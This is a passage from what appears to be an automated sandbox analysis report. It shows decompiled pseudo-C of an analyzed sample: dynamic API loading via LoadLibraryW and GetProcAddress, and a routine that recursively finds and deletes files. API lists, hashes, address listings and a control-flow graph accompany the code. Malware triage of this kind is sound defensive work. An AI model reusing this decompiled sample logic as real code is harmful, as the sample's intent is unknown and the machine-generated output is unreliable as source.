                                                                                                                                                                                                                            						if( *((short*)(_t321 - 2)) != 0x3a) {
                                                                                                                                                                                                                            							goto L17;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags = _v32 - _t283;
                                                                                                                                                                                                                            						if(_v32 == _t283) {
                                                                                                                                                                                                                            							goto L43;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L17;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t277 = _t258 - 5;
                                                                                                                                                                                                                            					if(_t277 == 0) {
                                                                                                                                                                                                                            						__eflags = _v44 - _t283;
                                                                                                                                                                                                                            						if(_v44 != _t283) {
                                                                                                                                                                                                                            							goto L43;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							__eflags = _v36 - 3;
                                                                                                                                                                                                                            							_v32 = 1;
                                                                                                                                                                                                                            							_v8 = _t283;
                                                                                                                                                                                                                            							_v20 = _t283;
                                                                                                                                                                                                                            							_v16 = (0 | _v36 == 0x00000003) + 1;
                                                                                                                                                                                                                            							_v40 = _t283;
                                                                                                                                                                                                                            							goto L20;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t281 = _t277 - 1;
                                                                                                                                                                                                                            					if(_t281 == 0) {
                                                                                                                                                                                                                            						__eflags = _v44 - _t283;
                                                                                                                                                                                                                            						if(_v44 != _t283) {
                                                                                                                                                                                                                            							goto L43;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_v32 = 2;
                                                                                                                                                                                                                            							_v8 = _t283;
                                                                                                                                                                                                                            							_v20 = _t283;
                                                                                                                                                                                                                            							goto L20;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t281 != 0x16) {
                                                                                                                                                                                                                            						goto L43;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_v32 = 3;
                                                                                                                                                                                                                            						_v8 = 1;
                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				GlobalFree(_v56);
                                                                                                                                                                                                                            				GlobalFree(_v24);
                                                                                                                                                                                                                            				GlobalFree(_v48);
                                                                                                                                                                                                                            				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
                                                                                                                                                                                                                            					L182:
                                                                                                                                                                                                                            					return _t332;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t225 =  *_t332 - 1;
                                                                                                                                                                                                                            					if(_t225 == 0) {
                                                                                                                                                                                                                            						_t187 = _t332 + 8; // 0x8
                                                                                                                                                                                                                            						_t324 = _t187;
                                                                                                                                                                                                                            						__eflags =  *_t324 - _t283;
                                                                                                                                                                                                                            						if( *_t324 != _t283) {
                                                                                                                                                                                                                            							_t226 = GetModuleHandleW(_t324); // executed
                                                                                                                                                                                                                            							__eflags = _t226 - _t283;
                                                                                                                                                                                                                            							 *(_t332 + 0x1008) = _t226;
                                                                                                                                                                                                                            							if(_t226 != _t283) {
                                                                                                                                                                                                                            								L171:
                                                                                                                                                                                                                            								_t192 = _t332 + 0x808; // 0x808
                                                                                                                                                                                                                            								_t325 = _t192;
                                                                                                                                                                                                                            								_t227 = E687E16BD( *(_t332 + 0x1008), _t325);
                                                                                                                                                                                                                            								__eflags = _t227 - _t283;
                                                                                                                                                                                                                            								 *(_t332 + 0x100c) = _t227;
                                                                                                                                                                                                                            								if(_t227 == _t283) {
                                                                                                                                                                                                                            									__eflags =  *_t325 - 0x23;
                                                                                                                                                                                                                            									if( *_t325 == 0x23) {
                                                                                                                                                                                                                            										_t195 = _t332 + 0x80a; // 0x80a
                                                                                                                                                                                                                            										_t231 = E687E13B1(_t195);
                                                                                                                                                                                                                            										__eflags = _t231 - _t283;
                                                                                                                                                                                                                            										if(_t231 != _t283) {
                                                                                                                                                                                                                            											__eflags = _t231 & 0xffff0000;
                                                                                                                                                                                                                            											if((_t231 & 0xffff0000) == 0) {
                                                                                                                                                                                                                            												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags = _v52 - _t283;
                                                                                                                                                                                                                            								if(_v52 != _t283) {
                                                                                                                                                                                                                            									L178:
                                                                                                                                                                                                                            									_t325[lstrlenW(_t325)] = 0x57;
                                                                                                                                                                                                                            									_t229 = E687E16BD( *(_t332 + 0x1008), _t325);
                                                                                                                                                                                                                            									__eflags = _t229 - _t283;
                                                                                                                                                                                                                            									if(_t229 != _t283) {
                                                                                                                                                                                                                            										L166:
                                                                                                                                                                                                                            										 *(_t332 + 0x100c) = _t229;
                                                                                                                                                                                                                            										goto L182;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									__eflags =  *(_t332 + 0x100c) - _t283;
                                                                                                                                                                                                                            									L180:
                                                                                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                                                                                            										goto L182;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									L181:
                                                                                                                                                                                                                            									_t206 = _t332 + 4;
                                                                                                                                                                                                                            									 *_t206 =  *(_t332 + 4) | 0xffffffff;
                                                                                                                                                                                                                            									__eflags =  *_t206;
                                                                                                                                                                                                                            									goto L182;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									__eflags =  *(_t332 + 0x100c) - _t283;
                                                                                                                                                                                                                            									if( *(_t332 + 0x100c) != _t283) {
                                                                                                                                                                                                                            										goto L182;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									goto L178;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t234 = LoadLibraryW(_t324);
                                                                                                                                                                                                                            							__eflags = _t234 - _t283;
                                                                                                                                                                                                                            							 *(_t332 + 0x1008) = _t234;
                                                                                                                                                                                                                            							if(_t234 == _t283) {
                                                                                                                                                                                                                            								goto L181;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L171;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t188 = _t332 + 0x808; // 0x808
                                                                                                                                                                                                                            						_t236 = E687E13B1(_t188);
                                                                                                                                                                                                                            						 *(_t332 + 0x100c) = _t236;
                                                                                                                                                                                                                            						__eflags = _t236 - _t283;
                                                                                                                                                                                                                            						goto L180;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t237 = _t225 - 1;
                                                                                                                                                                                                                            					if(_t237 == 0) {
                                                                                                                                                                                                                            						_t185 = _t332 + 0x808; // 0x808
                                                                                                                                                                                                                            						_t238 = _t185;
                                                                                                                                                                                                                            						__eflags =  *_t238 - _t283;
                                                                                                                                                                                                                            						if( *_t238 == _t283) {
                                                                                                                                                                                                                            							goto L182;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t229 = E687E13B1(_t238);
                                                                                                                                                                                                                            						L165:
                                                                                                                                                                                                                            						goto L166;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t237 != 1) {
                                                                                                                                                                                                                            						goto L182;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t81 = _t332 + 8; // 0x8
                                                                                                                                                                                                                            					_t284 = _t81;
                                                                                                                                                                                                                            					_t326 = E687E13B1(_t81);
                                                                                                                                                                                                                            					 *(_t332 + 0x1008) = _t326;
                                                                                                                                                                                                                            					if(_t326 == 0) {
                                                                                                                                                                                                                            						goto L181;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t332 + 0x1050)) = E687E12CC(_t284);
                                                                                                                                                                                                                            					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
                                                                                                                                                                                                                            					_t90 = _t332 + 0x808; // 0x808
                                                                                                                                                                                                                            					_t229 =  *(_t326->i + E687E13B1(_t90) * 4);
                                                                                                                                                                                                                            					goto L165;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1d6f
                                                                                                                                                                                                                            0x687e1cff
                                                                                                                                                                                                                            0x687e1d00
                                                                                                                                                                                                                            0x687e1d09
                                                                                                                                                                                                                            0x687e1d0c
                                                                                                                                                                                                                            0x687e1d19
                                                                                                                                                                                                                            0x687e1d19
                                                                                                                                                                                                                            0x687e1d0e
                                                                                                                                                                                                                            0x687e1d0e
                                                                                                                                                                                                                            0x687e1de7
                                                                                                                                                                                                                            0x687e1dea
                                                                                                                                                                                                                            0x687e1dee
                                                                                                                                                                                                                            0x687e1e61
                                                                                                                                                                                                                            0x687e1e65
                                                                                                                                                                                                                            0x687e1c43
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1c43
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1e65
                                                                                                                                                                                                                            0x687e1cfd
                                                                                                                                                                                                                            0x687e1c68
                                                                                                                                                                                                                            0x687e1c6b
                                                                                                                                                                                                                            0x687e1cce
                                                                                                                                                                                                                            0x687e1cd1
                                                                                                                                                                                                                            0x687e1ce3
                                                                                                                                                                                                                            0x687e1ce3
                                                                                                                                                                                                                            0x687e1ce6
                                                                                                                                                                                                                            0x687e1df3
                                                                                                                                                                                                                            0x687e1df6
                                                                                                                                                                                                                            0x687e1df6
                                                                                                                                                                                                                            0x687e1df8
                                                                                                                                                                                                                            0x687e21ae
                                                                                                                                                                                                                            0x687e21c6
                                                                                                                                                                                                                            0x687e21c6
                                                                                                                                                                                                                            0x687e21c9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e21b3
                                                                                                                                                                                                                            0x687e21b4
                                                                                                                                                                                                                            0x687e21b7
                                                                                                                                                                                                                            0x687e21ba
                                                                                                                                                                                                                            0x687e2244
                                                                                                                                                                                                                            0x687e224b
                                                                                                                                                                                                                            0x687e2251
                                                                                                                                                                                                                            0x687e2255
                                                                                                                                                                                                                            0x687e1e5c
                                                                                                                                                                                                                            0x687e1e5d
                                                                                                                                                                                                                            0x687e1e5d
                                                                                                                                                                                                                            0x687e1e5e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1e5e
                                                                                                                                                                                                                            0x687e21c0
                                                                                                                                                                                                                            0x687e21c3
                                                                                                                                                                                                                            0x687e21c3
                                                                                                                                                                                                                            0x687e21cb
                                                                                                                                                                                                                            0x687e21ce
                                                                                                                                                                                                                            0x687e2238
                                                                                                                                                                                                                            0x687e1e51
                                                                                                                                                                                                                            0x687e1e54
                                                                                                                                                                                                                            0x687e1e57
                                                                                                                                                                                                                            0x687e1e5a
                                                                                                                                                                                                                            0x687e1e5a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1e5a
                                                                                                                                                                                                                            0x687e21d0
                                                                                                                                                                                                                            0x687e21d3
                                                                                                                                                                                                                            0x687e21da
                                                                                                                                                                                                                            0x687e21da
                                                                                                                                                                                                                            0x687e21dd
                                                                                                                                                                                                                            0x687e21e1
                                                                                                                                                                                                                            0x687e21f5
                                                                                                                                                                                                                            0x687e21f5
                                                                                                                                                                                                                            0x687e21f8
                                                                                                                                                                                                                            0x687e21fc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e21fe
                                                                                                                                                                                                                            0x687e2202
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2204
                                                                                                                                                                                                                            0x687e220b
                                                                                                                                                                                                                            0x687e220b
                                                                                                                                                                                                                            0x687e2211
                                                                                                                                                                                                                            0x687e2214
                                                                                                                                                                                                                            0x687e2230
                                                                                                                                                                                                                            0x687e2216
                                                                                                                                                                                                                            0x687e221f
                                                                                                                                                                                                                            0x687e2222
                                                                                                                                                                                                                            0x687e2222
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2214
                                                                                                                                                                                                                            0x687e21e3
                                                                                                                                                                                                                            0x687e21e6
                                                                                                                                                                                                                            0x687e21ea
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e21ec
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e21ec
                                                                                                                                                                                                                            0x687e21d5
                                                                                                                                                                                                                            0x687e21d8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e21d8
                                                                                                                                                                                                                            0x687e1dfe
                                                                                                                                                                                                                            0x687e1dfe
                                                                                                                                                                                                                            0x687e1dff
                                                                                                                                                                                                                            0x687e1f49
                                                                                                                                                                                                                            0x687e1f49
                                                                                                                                                                                                                            0x687e1f50
                                                                                                                                                                                                                            0x687e1f53
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1f60
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e214b
                                                                                                                                                                                                                            0x687e214e
                                                                                                                                                                                                                            0x687e2151
                                                                                                                                                                                                                            0x687e1f8e
                                                                                                                                                                                                                            0x687e1f8e
                                                                                                                                                                                                                            0x687e1f8e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e208e
                                                                                                                                                                                                                            0x687e208e
                                                                                                                                                                                                                            0x687e2090
                                                                                                                                                                                                                            0x687e2097
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e20d6
                                                                                                                                                                                                                            0x687e20d6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e20a0
                                                                                                                                                                                                                            0x687e20a0
                                                                                                                                                                                                                            0x687e20a2
                                                                                                                                                                                                                            0x687e20a9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e20b2
                                                                                                                                                                                                                            0x687e20b2
                                                                                                                                                                                                                            0x687e20b4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e20e4
                                                                                                                                                                                                                            0x687e20e4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e20bd
                                                                                                                                                                                                                            0x687e20bd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e210a
                                                                                                                                                                                                                            0x687e210e
                                                                                                                                                                                                                            0x687e2113
                                                                                                                                                                                                                            0x687e2116
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e20c8
                                                                                                                                                                                                                            0x687e20c8
                                                                                                                                                                                                                            0x687e20cb
                                                                                                                                                                                                                            0x687e20cd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e20dd
                                                                                                                                                                                                                            0x687e20dd
                                                                                                                                                                                                                            0x687e20e6
                                                                                                                                                                                                                            0x687e20e6
                                                                                                                                                                                                                            0x687e1fc5
                                                                                                                                                                                                                            0x687e1fc5
                                                                                                                                                                                                                            0x687e1fc8
                                                                                                                                                                                                                            0x687e1fcf
                                                                                                                                                                                                                            0x687e1fd1
                                                                                                                                                                                                                            0x687e1fd3
                                                                                                                                                                                                                            0x687e1fda
                                                                                                                                                                                                                            0x687e1fdd
                                                                                                                                                                                                                            0x687e1fe2
                                                                                                                                                                                                                            0x687e1fe4
                                                                                                                                                                                                                            0x687e1fe6
                                                                                                                                                                                                                            0x687e1fea
                                                                                                                                                                                                                            0x687e1ff0
                                                                                                                                                                                                                            0x687e1ff6
                                                                                                                                                                                                                            0x687e1ff6
                                                                                                                                                                                                                            0x687e1ff8
                                                                                                                                                                                                                            0x687e1ff8
                                                                                                                                                                                                                            0x687e1ff9
                                                                                                                                                                                                                            0x687e1ff9
                                                                                                                                                                                                                            0x687e1ffd
                                                                                                                                                                                                                            0x687e2003
                                                                                                                                                                                                                            0x687e2005
                                                                                                                                                                                                                            0x687e2009
                                                                                                                                                                                                                            0x687e200e
                                                                                                                                                                                                                            0x687e200e
                                                                                                                                                                                                                            0x687e2010
                                                                                                                                                                                                                            0x687e2010
                                                                                                                                                                                                                            0x687e2013
                                                                                                                                                                                                                            0x687e2016
                                                                                                                                                                                                                            0x687e201f
                                                                                                                                                                                                                            0x687e2025
                                                                                                                                                                                                                            0x687e2028
                                                                                                                                                                                                                            0x687e2028
                                                                                                                                                                                                                            0x687e202a
                                                                                                                                                                                                                            0x687e202d
                                                                                                                                                                                                                            0x687e2033
                                                                                                                                                                                                                            0x687e2039
                                                                                                                                                                                                                            0x687e2039
                                                                                                                                                                                                                            0x687e203b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2041
                                                                                                                                                                                                                            0x687e2041
                                                                                                                                                                                                                            0x687e2045
                                                                                                                                                                                                                            0x687e204c
                                                                                                                                                                                                                            0x687e2070
                                                                                                                                                                                                                            0x687e2070
                                                                                                                                                                                                                            0x687e2074
                                                                                                                                                                                                                            0x687e2076
                                                                                                                                                                                                                            0x687e2079
                                                                                                                                                                                                                            0x687e2079
                                                                                                                                                                                                                            0x687e207c
                                                                                                                                                                                                                            0x687e207c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2074
                                                                                                                                                                                                                            0x687e2051
                                                                                                                                                                                                                            0x687e2054
                                                                                                                                                                                                                            0x687e2054
                                                                                                                                                                                                                            0x687e205b
                                                                                                                                                                                                                            0x687e205d
                                                                                                                                                                                                                            0x687e2060
                                                                                                                                                                                                                            0x687e2067
                                                                                                                                                                                                                            0x687e2068
                                                                                                                                                                                                                            0x687e206e
                                                                                                                                                                                                                            0x687e206e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e206e
                                                                                                                                                                                                                            0x687e2062
                                                                                                                                                                                                                            0x687e2065
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e22e4
                                                                                                                                                                                                                            0x687e22e8
                                                                                                                                                                                                                            0x687e22ea
                                                                                                                                                                                                                            0x687e22f1
                                                                                                                                                                                                                            0x687e22f6
                                                                                                                                                                                                                            0x687e22f9
                                                                                                                                                                                                                            0x687e22fb
                                                                                                                                                                                                                            0x687e2300
                                                                                                                                                                                                                            0x687e2312
                                                                                                                                                                                                                            0x687e2312
                                                                                                                                                                                                                            0x687e2300
                                                                                                                                                                                                                            0x687e22f9
                                                                                                                                                                                                                            0x687e22e8
                                                                                                                                                                                                                            0x687e2318
                                                                                                                                                                                                                            0x687e231b
                                                                                                                                                                                                                            0x687e2325
                                                                                                                                                                                                                            0x687e232d
                                                                                                                                                                                                                            0x687e233a
                                                                                                                                                                                                                            0x687e2340
                                                                                                                                                                                                                            0x687e2343
                                                                                                                                                                                                                            0x687e2273
                                                                                                                                                                                                                            0x687e2273
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2273
                                                                                                                                                                                                                            0x687e2349
                                                                                                                                                                                                                            0x687e234f
                                                                                                                                                                                                                            0x687e234f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2351
                                                                                                                                                                                                                            0x687e2351
                                                                                                                                                                                                                            0x687e2351
                                                                                                                                                                                                                            0x687e2351
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e231d
                                                                                                                                                                                                                            0x687e231d
                                                                                                                                                                                                                            0x687e2323
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2323
                                                                                                                                                                                                                            0x687e231b
                                                                                                                                                                                                                            0x687e22b2
                                                                                                                                                                                                                            0x687e22b8
                                                                                                                                                                                                                            0x687e22ba
                                                                                                                                                                                                                            0x687e22c0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e22c0
                                                                                                                                                                                                                            0x687e2286
                                                                                                                                                                                                                            0x687e228d
                                                                                                                                                                                                                            0x687e2293
                                                                                                                                                                                                                            0x687e2299
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2299
                                                                                                                                                                                                                            0x687e1e9d
                                                                                                                                                                                                                            0x687e1e9e
                                                                                                                                                                                                                            0x687e225d
                                                                                                                                                                                                                            0x687e225d
                                                                                                                                                                                                                            0x687e2263
                                                                                                                                                                                                                            0x687e2266
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e226d
                                                                                                                                                                                                                            0x687e2272
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2272
                                                                                                                                                                                                                            0x687e1ea5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1eab
                                                                                                                                                                                                                            0x687e1eab
                                                                                                                                                                                                                            0x687e1eb4
                                                                                                                                                                                                                            0x687e1eb9
                                                                                                                                                                                                                            0x687e1ebf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1ec5
                                                                                                                                                                                                                            0x687e1ed2
                                                                                                                                                                                                                            0x687e1ed8
                                                                                                                                                                                                                            0x687e1ee2
                                                                                                                                                                                                                            0x687e1ee8
                                                                                                                                                                                                                            0x687e1ef0
                                                                                                                                                                                                                            0x687e1f00
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1f00

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 687E12BB: GlobalAlloc.KERNEL32(00000040,?,687E12DB,?,687E137F,00000019,687E11CA,-000000A0), ref: 687E12C5
                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 687E1D2D
                                                                                                                                                                                                                            • lstrcpyW.KERNEL32 ref: 687E1D75
                                                                                                                                                                                                                            • lstrcpyW.KERNEL32 ref: 687E1D7F
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 687E1D92
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 687E1E74
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 687E1E79
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 687E1E7E
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 687E2068
                                                                                                                                                                                                                            • lstrcpyW.KERNEL32 ref: 687E2222
                                                                                                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000008), ref: 687E22A1
                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(00000008), ref: 687E22B2
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 687E230C
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00000808), ref: 687E2326
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.533272603.00000000687E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 687E0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533258912.00000000687E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533285337.00000000687E4000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533299887.00000000687E6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_687e0000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 245916457-0
                                                                                                                                                                                                                            • Opcode ID: 99e70ce56d74754632ea38516d0034836f517b6a4dfaf8d8eed82289ac3f14d4
                                                                                                                                                                                                                            • Instruction ID: 91b938edc63af476060ed72c68423359b6df63f741eca6d0aad99418e188a4c8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 99e70ce56d74754632ea38516d0034836f517b6a4dfaf8d8eed82289ac3f14d4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2228C71D5860ADADB10CFA8C68D6EDB7B4FB09316F90453AF1B5E2290D7709A81CB70
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 669 405d74-405d9a call 40603f 672 405db3-405dba 669->672 673 405d9c-405dae DeleteFileW 669->673 675 405dbc-405dbe 672->675 676 405dcd-405ddd call 406668 672->676 674 405f30-405f34 673->674 677 405dc4-405dc7 675->677 678 405ede-405ee3 675->678 682 405dec-405ded call 405f83 676->682 683 405ddf-405dea lstrcatW 676->683 677->676 677->678 678->674 681 405ee5-405ee8 678->681 684 405ef2-405efa call 40699e 681->684 685 405eea-405ef0 681->685 686 405df2-405df6 682->686 683->686 684->674 693 405efc-405f10 call 405f37 call 405d2c 684->693 685->674 689 405e02-405e08 lstrcatW 686->689 690 405df8-405e00 686->690 692 405e0d-405e29 lstrlenW FindFirstFileW 689->692 690->689 690->692 694 405ed3-405ed7 692->694 695 405e2f-405e37 692->695 709 405f12-405f15 693->709 710 405f28-405f2b call 4056ca 693->710 694->678 698 405ed9 694->698 699 405e57-405e6b call 406668 695->699 700 405e39-405e41 695->700 698->678 711 405e82-405e8d call 405d2c 699->711 712 405e6d-405e75 699->712 703 405e43-405e4b 700->703 704 405eb6-405ec6 FindNextFileW 700->704 703->699 705 405e4d-405e55 703->705 704->695 708 405ecc-405ecd FindClose 704->708 705->699 705->704 708->694 709->685 713 405f17-405f26 call 4056ca call 406428 709->713 710->674 722 405eae-405eb1 call 4056ca 711->722 723 405e8f-405e92 711->723 712->704 714 405e77-405e80 call 405d74 712->714 713->674 714->704 722->704 726 405e94-405ea4 call 4056ca call 406428 723->726 727 405ea6-405eac 723->727 726->704 727->704
                                                                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                                                                            			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                            				short _v556;
                                                                                                                                                                                                                            				short _v558;
                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAW _v604;
                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                            				signed int _t52;
                                                                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                                                                            				signed int _t62;
                                                                                                                                                                                                                            				void* _t64;
                                                                                                                                                                                                                            				signed char _t65;
                                                                                                                                                                                                                            				WCHAR* _t66;
                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                            				WCHAR* _t68;
                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t65 = _a8;
                                                                                                                                                                                                                            				_t68 = _a4;
                                                                                                                                                                                                                            				_v8 = _t65 & 0x00000004;
                                                                                                                                                                                                                            				_t38 = E0040603F(__eflags, _t68);
                                                                                                                                                                                                                            				_v12 = _t38;
                                                                                                                                                                                                                            				if((_t65 & 0x00000008) != 0) {
                                                                                                                                                                                                                            					_t62 = DeleteFileW(_t68); // executed
                                                                                                                                                                                                                            					asm("sbb eax, eax");
                                                                                                                                                                                                                            					_t64 =  ~_t62 + 1;
                                                                                                                                                                                                                            					 *0x42a2e8 =  *0x42a2e8 + _t64;
                                                                                                                                                                                                                            					return _t64;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_a4 = _t65;
                                                                                                                                                                                                                            				_t8 =  &_a4;
                                                                                                                                                                                                                            				 *_t8 = _a4 & 0x00000001;
                                                                                                                                                                                                                            				__eflags =  *_t8;
                                                                                                                                                                                                                            				if( *_t8 == 0) {
                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                            					E00406668(0x425750, _t68);
                                                                                                                                                                                                                            					__eflags = _a4;
                                                                                                                                                                                                                            					if(_a4 == 0) {
                                                                                                                                                                                                                            						E00405F83(_t68);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						lstrcatW(0x425750, L"\\*.*");
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags =  *_t68;
                                                                                                                                                                                                                            					if( *_t68 != 0) {
                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                            						lstrcatW(_t68, 0x40a014);
                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                            						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                                                                                                                                                                                            						_t38 = FindFirstFileW(0x425750,  &_v604);
                                                                                                                                                                                                                            						_t70 = _t38;
